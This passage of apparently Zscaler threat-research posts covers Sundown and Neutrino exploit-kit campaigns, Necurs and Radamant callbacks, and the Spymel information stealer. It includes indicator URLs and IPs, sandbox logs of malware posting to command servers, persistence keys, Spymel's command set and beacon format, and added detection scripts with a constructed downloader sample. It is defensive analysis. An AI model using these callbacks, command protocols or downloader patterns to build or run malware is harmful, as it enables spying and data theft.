ilsignoreconte[.]space/new/e/053d33558d578d2cafe77639209ab4d9.html
ilsignoreconte[.]space/new/e/49c58cc2b166b1a5b13eab5f472a4f7b.html
ilsignoreconte[.]space/new/e/49c58cc2b166b1a5b13eab5f472a4f7b.swf

Exploit Payloads

Sundown was seen sending the following exploit payloads:
poc2.flv - CVE-2015-3113
49c58cc2b166b1a5b13eab5f472a4f7b.swf - CVE-2015-5122
865hkjjhgfhjrgjkgyjtyg6lkjthyrkljtgh.html - CVE-2015-2419
8573855j6lhk4j54kl5jhk53j654364354.html - CVE-2013-2551
8500d58389eba3b3820a17641449b81d.html - CVE-2014-6332
360a296ea1e0abb38f1080f5e802fb4b.swf - CVE-2014-0515
053d33558d578d2cafe77639209ab4d9.swf - CVE-2015-3113 (via poc2.flv)

Malware Payloads

The delivery of the malware samples was another aspect of Sundown that we saw change. Through December 26, the malware payloads were downloaded from the URL "tequeryomuch[.]space/new/download.php?d=9b5b49f7f8c07f43effe4aecc67bf254". On the 27th we saw payloads coming from "tequeryomuch[.]space/?NGFlY2M2N2JmMjU0&d=9b5b49f7f8c07f43effe4aecc67bf254".
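The landing-page paths discussed under Landing Pages and the download URL above all carry the same campaign identifier, either as bare hex or wrapped in base64. The block below is an added example, not code from the original post: a small decoder that pulls those identifiers out of a Sundown-style URL. The URLs it is exercised on are the ones quoted in this post; the decoding logic itself is an assumption about how the kit builds its query strings. Run over the download URL, it also shows that the bare base64 token there decodes to the last 12 characters of the same 9b5b49f7... value carried in the d= parameter.

```python
# Added example (not from the original post): decoding the campaign identifiers in
# Sundown landing-page and download URLs. The URLs in __main__ are quoted in the
# post; the decoder's assumptions (hex token, optionally base64-wrapped) are mine.
import base64
import binascii
import re
from urllib.parse import urlsplit

HEX_RE = re.compile(r"^[0-9a-f]{12,64}$")


def decode_hex_token(token):
    """Return ('plain-hex', t) or ('b64-hex', decoded) for a Sundown-style token, else None."""
    if HEX_RE.match(token):
        return ("plain-hex", token)
    try:
        # Pad to a multiple of four so unpadded tokens (as seen on arbitraryh.top) decode too.
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return ("b64-hex", text) if HEX_RE.match(text) else None


def analyze_url(url):
    """Extract the identifiers carried in the query string of a Sundown URL."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    ids = []
    for item in parts.query.split("&"):
        if not item:
            continue
        hit = decode_hex_token(item)          # bare token, e.g. ?OWI1...NTQ=
        if hit is None and "=" in item:
            _, value = item.split("=", 1)     # key=value, e.g. d=9b5b...
            hit = decode_hex_token(value)
        if hit:
            ids.append(hit)
    return {"host": parts.hostname, "path": parts.path, "ids": ids}


if __name__ == "__main__":
    for u in ("millychiccolo.space/?9b5b49f7f8c07f43effe4aecc67bf254",
              "millychiccolo.space/?OWI1YjQ5ZjdmOGMwN2Y0M2VmZmU0YWVjYzY3YmYyNTQ=",
              "arbitraryh.top/?NjExODEzY2MzNTkyZTkyYWYxZmNlYjExODQzMzAz",
              "tequeryomuch.space/?NGFlY2M2N2JmMjU0&d=9b5b49f7f8c07f43effe4aecc67bf254"):
        r = analyze_url(u)
        print(r["host"], r["ids"])
```

The practical use is correlation: a proxy log full of rotating .space and .top domains collapses to a handful of identifiers once the base64 layer is stripped, which is how the landing page, the exploit requests and the payload download can be tied to one campaign.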

Some of the samples we observed during this campaign:
Sample: 4BAEEE098C34B463EB8AC709B9BD9967 (the sample seen on Threatglass)

Behavior:
{"dropped_path":"C:\\Documents and Settings\\user\\Application Data\\ZlFZQkBA\\twunk_32.exe","dropped_md5":"4BAEEE098C34B463EB8AC709B9BD9967"}
{"dropped_path":"C:\\WINDOWS\\Tasks\\ZlFZQkBA.job","dropped_md5":"22D5FD2A8675CF3B673D84716384AE8A"}
{"url":"imagescdn[.]ru/redir.php","destIP":"5.206.60.129","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0, Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
{"url":"imagescdn[.]ru/redir.php","destIP":"178.137.82.42","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0, Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
{"url":"imagescdn[.]ru/redir.php","destIP":"213.231.31.192","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0, Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}

Sample: D754B473AF45B8D3565C1323D29EAD51

Behavior:
{"dropped_path":"C:\\Documents and Settings\\user\\Application Data\\ZlFZQkBA\\taskman.exe","dropped_md5":"D754B473AF45B8D3565C1323D29EAD51"}
{"dropped_path":"C:\\WINDOWS\\Tasks\\ZlFZQkBA.job","dropped_md5":"07808D2E9A1D1607FCB81C1E0CA03358"}
{"url":"imagescdn[.]ru/redir.php","destIP":"109.251.77.14","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0, Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
{"url":"imagescdn[.]ru/redir.php","destIP":"109.251.77.14","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0, Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
{"url":"imagescdn[.]ru/redir.php","destIP":"213.111.238.98","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0, Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}

Sample: 6580F61B8B1AABFE3CAD6983CA9B2505

Behavior:
{"dropped_path":"C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\svchost.exe","dropped_md5":"FAA8EA9027ED6B6C875C247E59285270"}
{"dropped_path":"C:\\Documents and Settings\\user\\Application Data\\programutiliity\\filename.exe","dropped_md5":"A1429E43D7F19EB893FCC5D7BD2B21E9"}
{"dropped_path":"C:\\Documents and Settings\\user\\Start Menu\\Programs\\Startup\\filename.bat","dropped_md5":"7C444F8193480F6DC571BB6483E60A6A"}

Note that the first two samples share the same "ZlFZQkBA" folder name under Application Data and the same scheduled task name (ZlFZQkBA.job), and both post to imagescdn[.]ru/redir.php with a browser User-Agent that does not match the claimed Firefox version (rv:39.0 versus Firefox/38.0); those are the most durable host and network indicators in this set.

Geographic Distribution

We've primarily seen this Sundown campaign affect users located in Spain, though this may have more to do with the fact that the primary infected site is a Spanish-language forum.



Control Panel Login

Though we did not make any efforts to break into the Control Panel, we found it interesting that the login portal was so readily available to anyone who bothered to poke around at all. It's definitely looking a little flashier since Kafeine's analysis.


Neutrino Behavior

Neutrino, like Sundown, operates in the shadow of Angler. In this case, the first signs of activity in the campaign actually looked very much like Angler, so much so that Blue Coat's blog post about the same activity was later updated to correct the identification. Regardless of whether the initial traffic was actually Angler, the campaign changed noticeably over the observed period. The early stage triggered Angler signatures from a variety of sources; as can be seen below, the code features the "malware.dontneedcoffee.com" check that has been common in Angler.


Later stages of the campaign showed the expected Neutrino behavior: where the first stage after the infected website had initially been an Angler-like landing page, the injected code instead directs users to an HTML page that loads a malicious Flash object. This can be seen clearly in the side-by-side comparison below.


Infected Sites and Landing Pages

Many of the sites serving this Neutrino campaign were registered under .CZ, the top-level domain (TLD) for the Czech Republic. Since the full list is too long to include here, we have published it on Pastebin.

We saw landing pages served up from these IPs:
185.86.77.52
89.38.146.229
37.157.195.55
45.32.238.202
185.12.178.219
89.38.144.75 
The list of landing page domains is again too long to reproduce here, so please see our Pastebin for the data.

Payloads

While we did not observe a malicious payload from the "Angler" stage, we found the later stage of the campaign delivering a CryptoWall 4.0 payload. Shown below is the ransom notice from the locker.

Geographic Distribution

The geographic distribution of clients affected by this campaign is somewhat more dispersed than the Sundown campaign, though the majority of users were located in the US.


Malware Command and Control

In addition to Sundown and Neutrino (with its case of mistaken identity), we also identified Necurs and Radamant callback activity on the AMS network. Details of this activity follow.

Necurs Activity

Necurs is a fairly well-known rootkit that is often distributed by EKs and spam e-mails. We did not identify the infection vector for this campaign, but we saw some post infection activity to a Necurs C&C server hosted by AMS. The AMS C&C is only one of many C&Cs we saw, but in an interesting trend, we saw the Necurs callback activity drop off almost entirely going into 2016.




Please find the list of Necurs callback IPs on our Pastebin.

Radamant Activity

Radamant is yet another file locker which, according to BleepingComputer, became available only on December 7, 2015. While we haven't seen very widespread distribution of Radamant yet, we have seen samples from as early as December 4 attempting to communicate with a server at our new favorite hoster, as seen below.

{"url":"checkip.dyndns.org/","destIP":"91.198.22.70","ua":"","method":"GET","destPort":"80"}
{"url":"185[.]86.79.100/API.php","destIP":"185.86.79.100","ua":"","method":"POST","destPort":"80"}
{"url":"185[.]86.79.100/API.php","destIP":"185.86.79.100","ua":"","method":"POST","destPort":"80"}
{"url":"185[.]86.79.100/API.php","destIP":"185.86.79.100","ua":"","method":"POST","destPort":"80"}
{"url":"185[.]86.79.100/mask.php","destIP":"185.86.79.100","ua":"","method":"POST","destPort":"80"}

Conclusion

AMS may host many legitimate customers, and while we didn't intend to call them out specifically, we wanted to share some of the malicious behavior we have seen involving this network (and others) in an effort to help other defenders. ThreatLabZ will continue to monitor these campaigns and ensure protection for organizations using the Zscaler Internet security platform.

Wednesday, January 6, 2016

Yet Another Signed Malware - Spymel

Introduction

ThreatLabZ came across yet another malware family whose authors use compromised digital certificates to evade detection. The malware family in this case is the information-stealing Trojan Spymel, and the sample is a .NET executable signed with a legitimate DigiCert-issued certificate.

The infection cycle typically starts with a malicious JavaScript file that arrives in a ZIP archive as an e-mail attachment. Once the user opens the JavaScript file, it downloads and installs the malware executable on the victim's machine.

Surprisingly, the malicious JavaScript file in this case is not obfuscated and is easy to read, as seen in the screenshot below. The Spymel executable is downloaded from a remote location hardcoded in the JavaScript.

 Hardcoded URL for Spymel Download
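Because the first stage is a plain script inside a ZIP attachment, the cheapest place to catch this chain is the mail gateway, before any certificate comes into play. The block below is an added example, not code from the original post or from Spymel: it opens an attachment in memory, flags script members (including double-extension names), and pulls out the hardcoded URLs and Windows Script Host objects they reference. The archive, the script text, the file names and the .invalid URL are all constructed; only the delivery pattern comes from the post.

```python
# Added example (not from the original post): mail-gateway triage for the
# "script in a ZIP attachment" delivery described above. Archive, script, file
# names and the URL are constructed; the .invalid host is hypothetical.
import io
import re
import zipfile

SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".cmd", ".bat", ".ps1"}
URL_RE = re.compile(rb"https?://[^\s'\"<>)]+", re.I)
# Windows Script Host objects a plain downloader needs: fetch, write to disk, run.
DOWNLOADER_MARKERS = (b"MSXML2.XMLHTTP", b"WinHttp.WinHttpRequest", b"ADODB.Stream",
                      b"Scripting.FileSystemObject", b"WScript.Shell")

CONSTRUCTED_JS = b"""// constructed sample, hypothetical URL
var url = "http://downloads.example.invalid/files/invoice_2016.exe";
var http = new ActiveXObject("MSXML2.XMLHTTP");
http.open("GET", url, false);
var shell = new ActiveXObject("WScript.Shell");
"""


def build_sample_zip():
    """Constructed attachment: one script with a double extension plus a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("invoice_2016.pdf.js", CONSTRUCTED_JS)
        z.writestr("readme.txt", b"nothing to see here\n")
    return buf.getvalue()


def _extensions(name):
    """All extensions of the base name, e.g. 'invoice.pdf.js' -> ['.pdf', '.js']."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    return ["." + p for p in parts[1:]]


def triage_zip(data, max_member_bytes=1 << 20):
    """Flag script members of a ZIP and pull out the URLs and WSH objects they reference."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            exts = _extensions(info.filename)
            if not exts or exts[-1] not in SCRIPT_EXTENSIONS:
                continue
            # Bound the read so a crafted archive cannot exhaust memory during triage.
            body = z.open(info).read(max_member_bytes)
            findings.append({
                "name": info.filename,
                "double_extension": len(exts) > 1,
                "urls": [u.decode(errors="replace") for u in URL_RE.findall(body)],
                "markers": [m.decode() for m in DOWNLOADER_MARKERS if m in body],
            })
    return findings


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        flag = "double-ext" if f["double_extension"] else ""
        print(f["name"], flag, f["urls"], f["markers"])
```

A script member that both references an XMLHTTP/WinHttp object and contains a URL is enough to quarantine at the gateway; the extracted URL is then the first network indicator to block, ahead of any hash of the downloaded executable.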


Information Stealer - Trojan Spymel

The downloaded malware executable is a heavily obfuscated .NET binary, digitally signed with a certificate issued to "SBO INVEST". DigiCert promptly revoked the certificate when notified. Note that revocation only helps where the verifier actually checks revocation status, and a signature timestamped before the revocation date can still validate, so the revoked certificate should be treated as an indicator rather than as a guarantee that signed samples will be blocked. We noticed a newer variant within two weeks of the first, using another certificate issued to "SBO INVEST" that has also been revoked.

Certificate used to sign Spymel

Spymel payload hashes (MD5):
4E86F05B4F533DD216540A98591FFAC2
2B52B5AA33A0A067C34563CC3010C6AF

Installation
Spymel drops itself as “svchost.exe” and “Startup32.1.exe” in the following locations. The svchost.exe name mimics the legitimate Windows service host, which only ever runs from %SystemRoot%\System32 or %SystemRoot%\SysWOW64, so a copy under the user profile is suspicious on its own:

WinXP
%Application Data%\ProgramFiles(32.1)\svchost.exe
%UserProfile%\Start Menu\Programs\Startup\Startup32.1.exe

Win7
%UserProfile%\AppData\Roaming\ProgramFiles(32.1)\svchost.exe
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Startup32.1.exe
 
The following registry entries are created in the current user's hive to remain persistent on the target system. The value name is Sidebar(32.1) in every case:

WinXP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value Sidebar(32.1)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run, value Sidebar(32.1)

Win7
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value Sidebar(32.1)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run, value Sidebar(32.1)

The Run value is what launches the payload at logon; the StartupApproved entry only records whether that startup item is marked enabled, so removing the Run value (and the dropped files) is what actually breaks persistence.

Spymel Trojan configuration data including Command & Control server and File & Registry information is hardcoded within the executable as seen below:

Spymel settings

Module Information
During our analysis, we came across following modules in the malware executable:

Keylogging
This module logs all user keystrokes into a log file at the following location:

%Application Data%\ProgramFiles(32.1)\svchost.exe.tmp

The snapshot below shows the keylogging module; the class is named "kyl":

Keylogging code
ProtectMe
This module lets Spymel resist termination. It watches for process-management tools such as Task Manager (taskmgr), Process Explorer (procexp), Process Hacker and taskkill and interferes with them so the victim cannot end the malware process or other running processes. For Process Explorer the malware disables the 'OK' button on the kill confirmation prompt, as seen below:


The Microsoft taskkill command does not work as expected either, despite reporting SUCCESS:

Below is the code snippet of class “ProtectMe”:
Code of ProtectMe class

The malware monitors applications such as Task Manager, Process Explorer and Process Hacker. It calls the GetForegroundWindow() API to obtain the handle of the active window and, if the owning process is one of the tools above, tampers with that window's behaviour.

Network activity
Spymel connects to the remote domain android.sh (213.136.92.111) on TCP port 1216. Upon successful connection it starts sending the title of the active window to the server. Below is a screenshot of the network capture:

Each beacon has the form of a literal "awt" prefix, the base64-encoded window title, and a literal "djamel" trailer:

awt<Base64 encoded active window title>djamel
Below are some of the commands that the malware can receive from the Command & Control server:

Command      Description
i            Sends user name, OS name, running processes, video module flag and active window title.
GetDrives    Lists the drives on the system.
FileManager  Lists the folders and files in a given location.
Delete       Deletes the given file or folder.
Execute      Executes the given file.
Rename       Renames the given file or folder.
sup          Uninstalls the malware.
klogs        Uploads the keylogging file to the C&C. *
klold        Uploads a requested file to the C&C. *
ks           Searches for a given string in all keylogging files.
dklold       Deletes a given keylogging file.
dp           Sends a desktop snapshot.
dform        Downloads a file from a given URL.
VideoMode    Turns video recording on or off.
veUpdate     Provides video recording settings for specific processes.

* File contents are base64 encoded before upload. Base64 is an encoding, not encryption, so anyone who captures the traffic can recover the uploaded keystroke logs and files.
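As an added example (not code from the original post or from Spymel), the following Python decodes the "awt…djamel" beacon format described under Network activity and recognises the bare command tokens from the table above, so a captured TCP 1216 stream can be triaged line by line. The sample stream is constructed for this example; the beacon regex, the set of command tokens and the assumption that titles are UTF-8 text are this example's own, taken from the post's description rather than from the binary.

```python
import base64
import binascii
import re
from typing import List, Optional

# Beacon layout described in the post: literal "awt", a base64 window title,
# then the literal trailer "djamel".
BEACON_RE = re.compile(rb"^awt([A-Za-z0-9+/=]+)djamel$")

# Command tokens listed in the post for the C&C-to-client direction.
C2_COMMANDS = {"i", "GetDrives", "FileManager", "Delete", "Execute", "Rename",
               "sup", "klogs", "klold", "ks", "dklold", "dp", "dform",
               "VideoMode", "veUpdate"}


def decode_beacon(payload: bytes) -> Optional[str]:
    """Return the window title carried by a Spymel 'awt' beacon, or None
    when the payload is not a well-formed beacon."""
    m = BEACON_RE.match(payload.strip())
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        # Looks like a beacon but the body is not valid base64: do not crash
        # the triage loop, just report no title.
        return None
    # Assumption: titles are UTF-8/ASCII. Undecodable bytes are replaced
    # rather than dropped so the analyst still sees the rest of the title.
    return raw.decode("utf-8", errors="replace")


def classify(payload: bytes) -> str:
    """Label one captured line as a client beacon, a server command, or
    unrelated traffic."""
    title = decode_beacon(payload)
    if title is not None:
        return f"spymel-beacon: {title}"
    token = payload.strip().split(b" ", 1)[0].decode("ascii", errors="ignore")
    if token in C2_COMMANDS:
        return f"spymel-command: {token}"
    return "unrelated"


# Constructed sample stream (not a real capture): two client beacons, one
# server command, one malformed beacon and one unrelated HTTP line.
SAMPLE_STREAM = [
    b"awtTm90ZXBhZA==djamel",                                            # "Notepad"
    b"awt" + base64.b64encode(b"Chase Online - Google Chrome") + b"djamel",
    b"klogs",                                                            # server asks for the keylog file
    b"awt!!!notbase64djamel",                                            # malformed body, must not crash
    b"GET / HTTP/1.1",
]


def triage(stream) -> List[str]:
    """Classify every line of a captured stream in order."""
    return [classify(p) for p in stream]


if __name__ == "__main__":
    for line, label in zip(SAMPLE_STREAM, triage(SAMPLE_STREAM)):
        print(f"{label:45s} <- {line!r}")
```

Because the title is only base64 encoded, the decoded beacons directly reveal what the victim had in the foreground (here the constructed "Chase Online - Google Chrome"), which is also what makes the traffic easy to identify: a network sensor can match the fixed "awt" and "djamel" framing on port 1216 without needing to decrypt anything.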

Recording video of browser processes


Conclusion

Using a digital certificate to disguise malware is common, and Spymel is yet another example. Spymel is an information-stealing Trojan that spies on user activity on the compromised machine and relays it to the attacker. It typically arrives via spammed e-mail that relies on social engineering to get the target to open the attachment.

Zscaler’s ThreatLabZ has confirmed coverage for the initial downloader and Spymel payloads, ensuring protection for organizations using Zscaler’s Internet security platform.

Analysis by Tarun Dewan and Amandeep Kumar